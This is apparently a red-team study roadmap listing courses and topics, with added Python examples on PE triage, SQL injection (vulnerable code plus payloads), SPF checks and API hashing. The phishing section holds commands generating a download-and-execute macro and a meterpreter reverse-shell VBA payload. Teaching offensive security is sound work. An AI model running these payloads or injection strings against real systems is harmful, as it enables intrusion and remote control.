
Red team

Red Team TTP (Tactics, Techniques, and Procedures)

Red Team Goals, Development and Management

Roadmap
Basics

Programming/Networking/OS

Programming

First learn programming concepts (it does not matter which language; I prefer to learn C/C++ first)

Automation scripts (offensive tools, C2)

Malware / Trojans

OS (Operating System)

Windows

Windows Server 2016 (MCSA)

Domain Controller

Trees

Forest

Trusts

AD objects

Users

Printers

Computers

Groups

Servers

Accounts
Local user accounts

Administrator account

Guest account

SYSTEM

Active Directory Accounts

Administrator

Guest

KRBTGT

Credential authenticators

NT hash

LM Hash

NTLM Authentication process

Credentials storage

SAM Database

LSASS process memory

Process Token

- The security identifier (SID)

- primary token

- Impersonation

Command Prompt

Windows Internals

Windows Services

Processes

Registry

Windows Files

EXE / DLL / PE File Format

Windows API / native API

Memory management

STACK

HEAP
Memory pages

Virtual Memory
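The "EXE / DLL / PE File Format" item above is where most of the later material (droppers, injection, module stomping, AV triage) starts, so here is an added example, not part of the original roadmap, that parses the PE headers a loader reads and applies two checks an analyst runs on every sample: does the entry point land in an executable section, and does any section map as writable and executable at the same time? The sample PE is constructed inline with struct (it is not produced by a compiler) so the script runs offline; the constants are the real IMAGE_SCN_* flags from the PE specification.

```python
"""Minimal PE header parser plus two triage checks (added example, Python 3 stdlib only)."""
import struct
from dataclasses import dataclass

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> e_lfanew -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE\\0\\0 signature")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symptr, _nsyms, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    # PE32+ has a 64-bit ImageBase at +24; PE32 has BaseOfData at +24 and a 32-bit ImageBase at +28
    image_base = struct.unpack_from("<Q", data, opt + 24)[0] if magic == 0x20B else struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i  # section table starts right after the optional header
        name, vsize, vaddr, rsize, rptr, _, _, _, _, ch = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append(Section(name.rstrip(b"\x00").decode("ascii", "replace"), vsize, vaddr, rsize, rptr, ch))
    return {"machine": machine, "is_64": magic == 0x20B, "entry_point": entry_point,
            "image_base": image_base, "characteristics": characteristics, "sections": sections}


def section_for_rva(pe: dict, rva: int):
    """Return the section whose mapped range contains the RVA, or None."""
    for s in pe["sections"]:
        if s.virtual_address <= rva < s.virtual_address + max(s.virtual_size, s.raw_size):
            return s
    return None


def triage(pe: dict) -> list:
    """Checks a defender (or a dropper author) cares about: entry-point placement and W+X memory."""
    findings = []
    ep = section_for_rva(pe, pe["entry_point"])
    if ep is None:
        findings.append("entry point outside all sections")
    elif not ep.characteristics & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point in non-executable section {ep.name}")
    for s in pe["sections"]:
        if s.characteristics & IMAGE_SCN_MEM_WRITE and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"writable+executable section {s.name}")
        if s.raw_size == 0 and s.virtual_size > 0 and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"executable section {s.name} has no data on disk (filled at runtime?)")
    return findings


def build_sample_pe(entry_rva: int = 0x1000, extra_section=None) -> bytes:
    """Constructed minimal PE32+ (headers only, no section bodies) used as the sample input."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: NT headers follow the DOS header directly
    sections = [
        (b".text", 0x200, 0x1000, 0x200, 0x400, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".data", 0x100, 0x2000, 0x200, 0x600, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    if extra_section:
        sections.append(extra_section)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)  # AMD64, 240-byte optional header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+
    struct.pack_into("<I", opt, 16, entry_rva)       # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x140000000)     # ImageBase
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch) for n, vs, va, rs, rp, ch in sections)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table


if __name__ == "__main__":
    rwx = (b".rwx", 0x100, 0x3000, 0, 0, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    for sample in (build_sample_pe(), build_sample_pe(entry_rva=0x2000), build_sample_pe(extra_section=rwx)):
        print(triage(parse_pe(sample)) or "clean")
```

A clean compiler-built binary yields no findings; an entry point in a data section or a W+X section is exactly what packers and self-modifying droppers produce, which is why the Level 6 material on process unhooking and module stomping is about avoiding these artefacts rather than creating them.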

Linux

Networking

CCNA 200-301

Routing/Switching

TCP/IP and Internet Protocol

VLAN/ Subnetting

Network Security Concepts

ACL (Access Control List)

DHCP Spoofing

Port Security

Wireshark

Level 1

eJPT

Subdomain Enumeration

Sublist3r

DNSdumpster

Footprinting & Scanning

Masscan

nmap

Vulnerability Assessment

Searchsploit

ExploitDB

Nessus

Some vulnerabilities

SQL Injection

XSS

SMB null session attack
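For the SQL injection item above, an added example (not from the roadmap) that puts the vulnerable query next to its parameterized form and exercises both with the two classic payloads: an authentication bypass through an always-true OR, and a UNION-based read of another user's column. The table and rows are constructed in an in-memory SQLite database so the script runs offline.

```python
"""SQL injection: string-built query vs. parameterized query (added example, Python 3 + sqlite3)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for an application's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret'), ('bob', 'hunter2')")
    return con


def login_vulnerable(con, username: str, password: str):
    # Vulnerable on purpose: attacker-controlled text becomes part of the SQL grammar.
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(query).fetchone()  # a row on success, None on failure


def login_safe(con, username: str, password: str):
    # Placeholders keep the values out of the parser: quotes, OR and -- are just bytes in a string.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone()


# Payload 1: close the string, add an always-true disjunct, comment out the password check.
BYPASS_USER = "' OR '1'='1' -- "
# Payload 2: empty out the first SELECT and UNION in a column the page never meant to return.
UNION_PASSWORD = "' UNION SELECT password FROM users WHERE username = 'bob' -- "


def run_demo() -> dict:
    con = make_db()
    return {
        "vuln_bypass": login_vulnerable(con, BYPASS_USER, "anything"),
        "vuln_union": login_vulnerable(con, "nobody", UNION_PASSWORD),
        "safe_bypass": login_safe(con, BYPASS_USER, "anything"),
        "safe_union": login_safe(con, "nobody", UNION_PASSWORD),
        "safe_valid": login_safe(con, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k:12s} -> {v}")
```

The UNION case is the one worth remembering when testing: the application still "authenticates" a user, but the value it echoes back is bob's password, which is how column-by-column extraction starts. Input filtering is not the fix; the parameterized version returns None for both payloads with no blacklist at all.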

OSCP & eCPPTv2


OSCP

Penetration Testing: What You Should Know

Getting Comfortable with Kali Linux

Command Line Fun

Practical Tools

Bash Scripting

Passive Information Gathering

Active Information Gathering

Vulnerability Scanning

Web Application Attacks

Introduction to Buffer Overflows

Windows Buffer Overflows

Linux Buffer Overflows

Client-Side Attacks

Locating Public Exploits

Fixing Exploits

File Transfers

Antivirus Evasion

Privilege Escalation

Password Attacks

Port Redirection and Tunneling

Active Directory Attacks

The Metasploit Framework

PowerShell Empire

eCPPTv2

Fundamentals of buffer overflow exploits

Cryptography and password cracking

Fundamentals of network security including reconnaissance, spoofing attacks, post-exploitation, and social engineering

Linux and Windows exploitation and privilege escalation


Basics of web application security including reconnaissance, cross-site scripting, and SQL injection

Wi-Fi security and attacks

CTF

TryHackMe

Hack The Box

Level 2

Post-exploitation (Living off the Land)


GitHub - emilyanncr/Windows-Post-Ex…
https://t.me/TheMalware_Team/2934

Gaining access to a client workstation or a server is only the first step in a typical
penetration test. Once we gain initial access, our goal is to compromise more of
the organization’s assets, either to obtain more privileged access, or gain access to
confidential information.

Internal information gathering

Privilege escalation
Checklists/Windows-Privilege-Escalati…
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming#-privilege-escalation

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#cve-2019-14287

https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md

Persistence
GitHub - yeyintminthuhtut/Awesome-…

TCM Security / Hackersploit/ Pentester Academy

Level 3

CRTP/CRTE (Pentester Academy courses) & Active Directory attacks and lateral movement (TCM Security courses)

Stolen credentials

Some commands, options and modules require local administrator privileges, for example dumping hashes, establishing persistence and lateral movement. Adding a user to the local Administrators group needs local admin, some enumeration requires local admin, and enabling or disabling some protections also needs local admin.

- Local Administrator: SAM snapshot (dumping the local SAM database)

- Local Administrator: LAPS (Local Administrator Password Solution)

Mimikatz

Processing Credentials Offline

Lateral Movement

There are only a few known lateral movement techniques against Windows that reuse stolen credentials, such as PsExec, WMI, DCOM and PSRemoting.

Some tools require clear-text credentials, while others (CrackMapExec, for example) also accept the NT hash.

They all require local administrator access to the target machine.

Pass the hash / Pass the password

Token Impersonation

Attacks

Local Network Attacks: LLMNR and NBT-NS Poisoning

SMB Relay Attack

IPv6 Attacks (rogue DHCPv6 server)

Kerberos Delegation Attacks

Spoofing SSDP and UPnP Devices with EvilSSDP

Post-Compromise Enumeration
Before performing any attack with those credentials, it is possible and necessary to perform advanced enumeration, based on the privileges of the accounts obtained.

PowerView

BloodHound
enum4linux

CrackMapExec

Level 4

OSEP/PTX
https://github.com/In3x0rabl3/OSEP/blob/main/osep_checklistv2.md

https://exploit-me.com/blog/osep-cheat-sheet/

Phishing assessment

Client-side attacks

HTML Smuggling

Windows Script Host

VBS

JScript

Microsoft Office

VBA

DDE

macro_pack

Luckystrike

unicorn

python unicorn.py windows/download_exec url=http://192.168.122:8080/test.exe macro

metasploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f vba-psh

DotNetToJScript

DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js

Email Security

Sender Policy Framework

Bypass Anti-spam

DKIM (DomainKeys Identified Mail): verifying message content
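For the "Sender Policy Framework" and "Bypass Anti-spam" items, an added example (not part of the roadmap) of how a receiving mail server evaluates SPF, reduced to the mechanisms that can be checked offline: ip4, ip6, include and all, with the +, -, ~ and ? qualifiers. The DNS TXT records are a constructed table standing in for live lookups, and the a/mx/ptr/exists mechanisms are skipped because they need DNS. The point for a phishing assessment is the last term of the record: -all rejects a spoofed sender, while ~all and ?all only mark it.

```python
"""Offline SPF evaluation over a constructed DNS table (added example, Python 3 stdlib)."""
import ipaddress

# Constructed TXT records; None means the domain publishes no SPF at all.
DNS_TXT = {
    "corp.example": "v=spf1 ip4:203.0.113.0/24 include:mail.provider.example -all",
    "mail.provider.example": "v=spf1 ip4:198.51.100.10 ip4:198.51.100.11 ~all",
    "weak.example": "v=spf1 ip4:203.0.113.5 ?all",
    "nospf.example": None,
}

QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_spf(domain: str):
    txt = DNS_TXT.get(domain)
    return txt if txt and txt.lower().startswith("v=spf1") else None


def check_spf(domain: str, sender_ip: str, _depth: int = 0) -> str:
    """Return the SPF result for sender_ip claiming MAIL FROM @domain (RFC 7208 result names)."""
    if _depth > 10:  # RFC 7208 limits DNS-querying mechanisms (include, a, mx, ...) to 10
        return "permerror"
    record = lookup_spf(domain)
    if record is None:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"  # default qualifier when none is written
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            matched = True
        elif mech in ("ip4", "ip6"):
            # an IPv6 sender never matches an ip4 network and vice versa; ipaddress returns False
            matched = ip in ipaddress.ip_network(arg, strict=False)
        elif mech == "include":
            # include only matches when the referenced record yields "pass"; its fail/softfail is ignored
            matched = check_spf(arg, sender_ip, _depth + 1) == "pass"
        else:
            continue  # a, mx, ptr, exists: skipped in this offline version
        if matched:
            return QUALIFIER_RESULT[qualifier]
    return "neutral"  # no mechanism matched and no "all" term


if __name__ == "__main__":
    for dom, ip in (("corp.example", "203.0.113.7"), ("corp.example", "198.51.100.10"),
                    ("corp.example", "192.0.2.1"), ("mail.provider.example", "192.0.2.1"),
                    ("weak.example", "192.0.2.1"), ("nospf.example", "192.0.2.1")):
        print(f"{dom:24s} {ip:16s} {check_spf(dom, ip)}")
```

SPF is evaluated against the envelope sender (MAIL FROM), not the From: header the victim sees, so a domain that publishes -all is still spoofable in the displayed From: unless DMARC requires alignment between the two. That gap, plus the softfail and neutral results above, is what the "Bypass Anti-spam" item is really about.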

Defense evasion
Bypass AMSI

Invoke-Obfuscation

Bypass AV

Sections Shellcode Process Injector (C#)

Shellcode Process Hollowing (C#)

Shellcode Process Injector (C# & PS1)

Bypass Application whitelisting

Bypass Windows AppLocker

Also covers privilege escalation, lateral movement and AD

Level 5

Book 1: Red Team Development and Operations (SANS SEC564 Red Team Operations)
This book is the culmination of years of experience in IT and cybersecurity. Its components exist as rough notes, ideas and formal processes that the authors developed and adopted while leading and executing red team engagements over many years. The concepts described in the book have been used to successfully plan, deliver and execute professional red team engagements of all sizes and complexities. Some of these concepts have been documented and integrated into red team management processes.

ENGAGEMENT PLANNING

Roles and responsibilities

Rules of Engagement (ROE)

Threat planning

ENGAGEMENT EXECUTION

Execution concepts

Command and control server (C2)

ENGAGEMENT CULMINATION

ENGAGEMENT REPORTING

Book 2: Hands-On Red Team Tactics: A practical guide to mastering Red Team operations (red team practice with a command and control server)

Level 6

Before the Sektor7 courses I highly recommend reading these books:

First book: Malware Analysis and Detection Engineering

Second book: Learning Malware Analysis: Explore the concepts, tools, and techniques

Sektor7 courses on red teaming and malware development


Write your own offensive Tools and bypass defenders

Process Injection and Code Injections

DLL Injection / Reflective DLL Injection

Write Your own Dropper

Unhooking (removing EDR hooks in the process)

API hooking

Module Stomping / PPID Spoof / Command line Spoof

Detecting debuggers / dynamic-analysis sandboxes

Anti-static analysis & API hashing
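API hashing, the last item of the Sektor7 list, is the technique of resolving imports by a hash of the export name instead of the name itself, so that strings like "LoadLibraryA" never appear in the payload. The added example below (not from the courses or the roadmap) implements the ROR13 name hash used by the classic Win32 shellcode lineage, shows the resolver side (walk an export list, hash each name, compare) and the analyst side (precompute a hash-to-name table to recover what a sample imports). The export list is a constructed stand-in for kernel32's export table.

```python
"""ROR13 API name hashing: resolver and reverse lookup (added example, Python 3 stdlib)."""


def ror13_hash(name: str) -> int:
    """h = ror32(h, 13) + byte, over the ASCII export name without a terminator."""
    h = 0
    for ch in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ch) & 0xFFFFFFFF
    return h


# Constructed export list standing in for a module's export name table.
SAMPLE_EXPORTS = ["CreateFileA", "GetProcAddress", "LoadLibraryA",
                  "VirtualAlloc", "WriteProcessMemory", "ExitProcess"]


def resolve_by_hash(exports, wanted: int):
    """What position-independent code does at runtime: no string compare, only a 32-bit compare."""
    for name in exports:
        if ror13_hash(name) == wanted:
            return name
    return None


def build_lookup_table(exports) -> dict:
    """Defender side: hash every known export once, then map constants found in a sample back to names."""
    return {ror13_hash(name): name for name in exports}


def recover_imports(hash_constants, exports) -> list:
    """Translate a list of 32-bit constants pulled out of a sample into the API names they select."""
    table = build_lookup_table(exports)
    return [table.get(h, f"unknown:{h:#010x}") for h in hash_constants]


if __name__ == "__main__":
    for n in SAMPLE_EXPORTS:
        print(f"{ror13_hash(n):#010x}  {n}")
    print(recover_imports([0xEC0E4E8E, 0x7C0DFCAA, 0xDEADBEEF], SAMPLE_EXPORTS))
```

Two things follow for detection engineering: a fixed, public hash function means the table can be precomputed for every Windows DLL, so the obfuscation only defeats strings-based triage, not an analyst who recognises the constants; and the resolver's loop over the export table (PEB walk, then EAT parse) is itself a behaviour worth a rule, independent of which hash is used.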

Level 7

Cobalt Strike course: Raphael Mudge, Red Team Ops with Cobalt Strike (1 of …

Level 8

Zero-Point Security courses: Red Team Ops I and Red Team Ops II

Zero-Point Security

RED TEAM OPS I

Command and control

Initial Compromise

Host reconnaissance

Host persistence

Host privilege escalation

and more

RED TEAM OPS II

Defensive Evasion

EDR Evasion

C2 infrastructure

Process Injection

Level 9

Exploit Development

The Shellcoder's Handbook, Gray Hat Hacking, Hacking: The Art of Exploitation, and the OSED course, for finding and writing your own exploits (3 books and the OSED course)

Level 10

Read Sparc Flow's books "How to Hack Like a Legend" and "How to Hack Like a Pornstar"
